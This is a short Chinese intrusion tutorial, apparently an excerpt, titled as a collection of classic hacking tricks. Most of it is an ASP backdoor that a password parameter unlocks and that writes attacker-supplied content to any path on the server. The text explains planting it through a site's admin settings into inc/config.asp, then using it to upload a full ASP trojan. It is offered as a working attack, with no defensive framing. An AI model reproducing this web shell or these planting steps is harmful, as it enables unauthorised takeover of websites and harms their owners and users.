几个用过的经典入侵技巧整理

if Request("xiaoxin")="520" then

dim allen,creat,text,thisline,path

if Request("creat")="yes" then

Set fs = CreateObject("Scripting.FileSystemObject")

Set outfile=fs.CreateTextFile(server.mappath(Request("path")))

outfile.WriteLine Request("text")

Response.write "小新恭喜"

end if

Response.write "<form method=’POST’action=’"&Request.ServerVariables("URL")&"?xiaoxin=520&creat=yes’>"

Response.write "<textarea name=’text’>"&thisline&"</textarea><br>"

Response.write "<input type=’text’ name=’path’ value=’"&Request("path")&"’>"

Response.write "<input name=’submit’ type=’submit’ value=’ok’ ></form>"

Response.end

end if

%>

★

然后保存一下，千万注意，这个时候，千万别跳转任何页面。直接在ie地址栏内将admin/Admin_Login.asp替换成 inc/config.asp?xiaoxin=520，有人会问为什么了？因为在上边版权信息内的代码，是一段发送程序，利用 inc/config.asp相关文件信息所写。

进入这个页面之后会发现：这是啥玩意？ 好象一个小马。那你就当小马用好了，上面写你的ASP木马代码，下面写上路径，如图5、6。